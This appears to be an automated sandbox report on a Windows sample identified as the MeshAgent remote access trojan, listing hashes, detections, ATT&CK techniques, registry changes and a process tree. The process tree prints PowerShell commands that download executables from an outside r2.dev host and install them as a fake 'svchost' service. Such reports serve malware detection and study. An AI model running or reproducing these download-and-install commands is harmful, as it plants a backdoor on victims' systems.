meshagent | d2f04edeffe112dabe2da967ffed766eeb4fbcedc6d193b28954fb3c035b5668

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/10/2024, 03:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe
Size

14.5MB
MD5

9d69443400acb97361efa9cf8e17f3ec
SHA1

2ac173ad00b5d38e2bc9478131f1cdb179b72e97
SHA256

d2f04edeffe112dabe2da967ffed766eeb4fbcedc6d193b28954fb3c035b5668
SHA512

91fad4044d8ce4343b716fdbf459223644ca4964f8768b9098d391699a40d76f00c97953cae69651765c19c998b0fb6effd0450e1fbb059bb6bd419afdeda665
SSDEEP

393216:QibEDlz7snaqtvylAjWZ0Xq9YLuxMfCVb2Xc2ZNLj+waARY:QibIlshtvylAjWZ0Xq9YLuxMfCVKs2jm

Score

10^/10

meshagent backdoor discovery execution persistence rat trojan upx

Malware Config

Signatures

Detects MeshAgent payload 4 IoCs

resource	yara_rule
behavioral2/memory/804-87-0x00007FF619410000-0x00007FF619794000-memory.dmp	family_meshagent
behavioral2/memory/952-116-0x00007FF619410000-0x00007FF619794000-memory.dmp	family_meshagent
behavioral2/memory/3356-140-0x00007FF619410000-0x00007FF619794000-memory.dmp	family_meshagent
behavioral2/memory/3356-141-0x00007FF619410000-0x00007FF619794000-memory.dmp	family_meshagent

MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	4292	powershell.exe
18	3636	powershell.exe
25	1628	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3636	powershell.exe
1628	powershell.exe
3496	powershell.exe
3164	powershell.exe
2236	powershell.exe
2268	powershell.exe

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\""	svchost.exe

Executes dropped EXE 4 IoCs

pid	Process
2908	_가이아서버 접속기.exe
804	svchost.exe
952	svchost.exe
3356	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\ncrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\Kernel.Appcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	svchost.exe
File opened for modification	C:\Windows\System32\msvcp_win.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	svchost.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\win32u.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\sechost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\crypt32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\msvcrt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\bcrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\svchost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\combase.pdb	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\03B3EE43C2EBAC4D4565628A73CBD5E73DC705E8	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\03B3EE43C2EBAC4D4565628A73CBD5E73DC705E8	svchost.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\exe\svchost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\exe\svchost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\D5272CE288404CD974F24BD43479191CE97A2089	svchost.exe
File opened for modification	C:\Windows\System32\crypt32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\sechost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\user32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	svchost.exe
File opened for modification	C:\Windows\System32\gdi32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\shell32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\combase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	svchost.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0010000000023b70-80.dat	upx
behavioral2/memory/804-83-0x00007FF619410000-0x00007FF619794000-memory.dmp	upx
behavioral2/memory/804-87-0x00007FF619410000-0x00007FF619794000-memory.dmp	upx
behavioral2/memory/952-116-0x00007FF619410000-0x00007FF619794000-memory.dmp	upx
behavioral2/memory/3356-140-0x00007FF619410000-0x00007FF619794000-memory.dmp	upx
behavioral2/memory/3356-141-0x00007FF619410000-0x00007FF619794000-memory.dmp	upx

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2972	2908	WerFault.exe	92

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	_가이아서버 접속기.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133740408891414708"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4292	powershell.exe
4292	powershell.exe
3164	powershell.exe
3164	powershell.exe
2236	powershell.exe
2236	powershell.exe
3636	powershell.exe
3636	powershell.exe
3636	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
2268	powershell.exe
2268	powershell.exe
2268	powershell.exe
3496	powershell.exe
3496	powershell.exe
3496	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4184	wmic.exe
Token: SeIncreaseQuotaPrivilege	4184	wmic.exe
Token: SeSecurityPrivilege	4184	wmic.exe
Token: SeTakeOwnershipPrivilege	4184	wmic.exe
Token: SeLoadDriverPrivilege	4184	wmic.exe
Token: SeSystemtimePrivilege	4184	wmic.exe
Token: SeBackupPrivilege	4184	wmic.exe
Token: SeRestorePrivilege	4184	wmic.exe
Token: SeShutdownPrivilege	4184	wmic.exe
Token: SeSystemEnvironmentPrivilege	4184	wmic.exe
Token: SeUndockPrivilege	4184	wmic.exe
Token: SeManageVolumePrivilege	4184	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4184	wmic.exe
Token: SeIncreaseQuotaPrivilege	4184	wmic.exe
Token: SeSecurityPrivilege	4184	wmic.exe
Token: SeTakeOwnershipPrivilege	4184	wmic.exe
Token: SeLoadDriverPrivilege	4184	wmic.exe
Token: SeSystemtimePrivilege	4184	wmic.exe
Token: SeBackupPrivilege	4184	wmic.exe
Token: SeRestorePrivilege	4184	wmic.exe
Token: SeShutdownPrivilege	4184	wmic.exe
Token: SeSystemEnvironmentPrivilege	4184	wmic.exe
Token: SeUndockPrivilege	4184	wmic.exe
Token: SeManageVolumePrivilege	4184	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5068	wmic.exe
Token: SeIncreaseQuotaPrivilege	5068	wmic.exe
Token: SeSecurityPrivilege	5068	wmic.exe
Token: SeTakeOwnershipPrivilege	5068	wmic.exe
Token: SeLoadDriverPrivilege	5068	wmic.exe
Token: SeSystemtimePrivilege	5068	wmic.exe
Token: SeBackupPrivilege	5068	wmic.exe
Token: SeRestorePrivilege	5068	wmic.exe
Token: SeShutdownPrivilege	5068	wmic.exe
Token: SeSystemEnvironmentPrivilege	5068	wmic.exe
Token: SeUndockPrivilege	5068	wmic.exe
Token: SeManageVolumePrivilege	5068	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	5068	wmic.exe
Token: SeIncreaseQuotaPrivilege	5068	wmic.exe
Token: SeSecurityPrivilege	5068	wmic.exe
Token: SeTakeOwnershipPrivilege	5068	wmic.exe
Token: SeLoadDriverPrivilege	5068	wmic.exe
Token: SeSystemtimePrivilege	5068	wmic.exe
Token: SeBackupPrivilege	5068	wmic.exe
Token: SeRestorePrivilege	5068	wmic.exe
Token: SeShutdownPrivilege	5068	wmic.exe
Token: SeSystemEnvironmentPrivilege	5068	wmic.exe
Token: SeUndockPrivilege	5068	wmic.exe
Token: SeManageVolumePrivilege	5068	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4544	wmic.exe
Token: SeIncreaseQuotaPrivilege	4544	wmic.exe
Token: SeSecurityPrivilege	4544	wmic.exe
Token: SeTakeOwnershipPrivilege	4544	wmic.exe
Token: SeLoadDriverPrivilege	4544	wmic.exe
Token: SeSystemtimePrivilege	4544	wmic.exe
Token: SeBackupPrivilege	4544	wmic.exe
Token: SeRestorePrivilege	4544	wmic.exe
Token: SeShutdownPrivilege	4544	wmic.exe
Token: SeSystemEnvironmentPrivilege	4544	wmic.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 4292	2300	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	85
PID 2300 wrote to memory of 4292	2300	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	85
PID 2300 wrote to memory of 5040	2300	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	89
PID 2300 wrote to memory of 5040	2300	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	89
PID 5040 wrote to memory of 1596	5040	cmd.exe	90
PID 5040 wrote to memory of 1596	5040	cmd.exe	90
PID 4016 wrote to memory of 2908	4016	explorer.exe	92
PID 4016 wrote to memory of 2908	4016	explorer.exe	92
PID 4016 wrote to memory of 2908	4016	explorer.exe	92
PID 4292 wrote to memory of 3164	4292	powershell.exe	94
PID 4292 wrote to memory of 3164	4292	powershell.exe	94
PID 4292 wrote to memory of 2236	4292	powershell.exe	97
PID 4292 wrote to memory of 2236	4292	powershell.exe	97
PID 4292 wrote to memory of 3636	4292	powershell.exe	100
PID 4292 wrote to memory of 3636	4292	powershell.exe	100
PID 4292 wrote to memory of 1628	4292	powershell.exe	106
PID 4292 wrote to memory of 1628	4292	powershell.exe	106
PID 4292 wrote to memory of 2268	4292	powershell.exe	109
PID 4292 wrote to memory of 2268	4292	powershell.exe	109
PID 2268 wrote to memory of 804	2268	powershell.exe	110
PID 2268 wrote to memory of 804	2268	powershell.exe	110
PID 952 wrote to memory of 4184	952	svchost.exe	112
PID 952 wrote to memory of 4184	952	svchost.exe	112
PID 952 wrote to memory of 5068	952	svchost.exe	114
PID 952 wrote to memory of 5068	952	svchost.exe	114
PID 952 wrote to memory of 4544	952	svchost.exe	116
PID 952 wrote to memory of 4544	952	svchost.exe	116
PID 952 wrote to memory of 1980	952	svchost.exe	118
PID 952 wrote to memory of 1980	952	svchost.exe	118
PID 952 wrote to memory of 3000	952	svchost.exe	120
PID 952 wrote to memory of 3000	952	svchost.exe	120
PID 952 wrote to memory of 4700	952	svchost.exe	122
PID 952 wrote to memory of 4700	952	svchost.exe	122
PID 3356 wrote to memory of 5040	3356	svchost.exe	125
PID 3356 wrote to memory of 5040	3356	svchost.exe	125
PID 3356 wrote to memory of 588	3356	svchost.exe	127
PID 3356 wrote to memory of 588	3356	svchost.exe	127
PID 3356 wrote to memory of 1180	3356	svchost.exe	129
PID 3356 wrote to memory of 1180	3356	svchost.exe	129
PID 3356 wrote to memory of 4292	3356	svchost.exe	132
PID 3356 wrote to memory of 4292	3356	svchost.exe	132
PID 3356 wrote to memory of 3976	3356	svchost.exe	134
PID 3356 wrote to memory of 3976	3356	svchost.exe	134
PID 3356 wrote to memory of 3496	3356	svchost.exe	137
PID 3356 wrote to memory of 3496	3356	svchost.exe	137

C:\Users\Admin\AppData\Local\Temp\2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Users\Admin\AppData\local\svchost\svchost.exe
      "C:\Users\Admin\AppData\local\svchost\svchost.exe" -install
      4⤵
      Sets service image path in registry
      Executes dropped EXE
      PID:804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5040
- - C:\Windows\explorer.exe
    explorer.exe "_가이아서버 접속기.exe"
    3⤵
    PID:1596

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
  "C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 860
    3⤵
    - Program crash
    PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2908 -ip 2908
1⤵
PID:4984

C:\Users\Admin\AppData\local\svchost\svchost.exe
"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:952
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5068
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4544
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:1980
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:3000
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4700

C:\Users\Admin\AppData\local\svchost\svchost.exe
"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:5040
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:588
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:1180
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:4292
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
